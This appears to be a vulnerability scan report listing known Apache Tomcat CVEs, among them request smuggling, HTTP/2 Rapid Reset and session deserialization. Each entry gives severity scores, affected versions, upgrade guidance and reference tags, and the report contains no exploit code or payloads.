If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2023-44487 suppress
CISA Known Exploited Vulnerability: Product: IETF HTTP/2 Name: HTTP/2 Rapid Reset Attack Vulnerability Date Added: 2023-10-10 Description: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS). Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Due Date: 2023-10-31 Notes: This vulnerability affects a common open-source component, third-party library, or protocol used by different products. For more information, please see: HTTP/2 Rapid Reset Vulnerability, CVE-2023-44487 | CISA: https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487; https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/; https://nvd.nist.gov/vuln/detail/CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY cve@mitre.org - BROKEN_LINK cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,VENDOR_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT,RELEASE_NOTES cve@mitre.org - PRODUCT,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2023-46589 suppress
Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single
request as multiple requests leading to the possibility of request
smuggling when behind a reverse proxy.
Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2024-24549 suppress
Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue. CWE-20 Improper Input Validation, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2019-12418 suppress
When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-9484 suppress
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,MITIGATION,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - MAILING_LIST,MITIGATION,PATCH,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2021-25329 suppress
The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
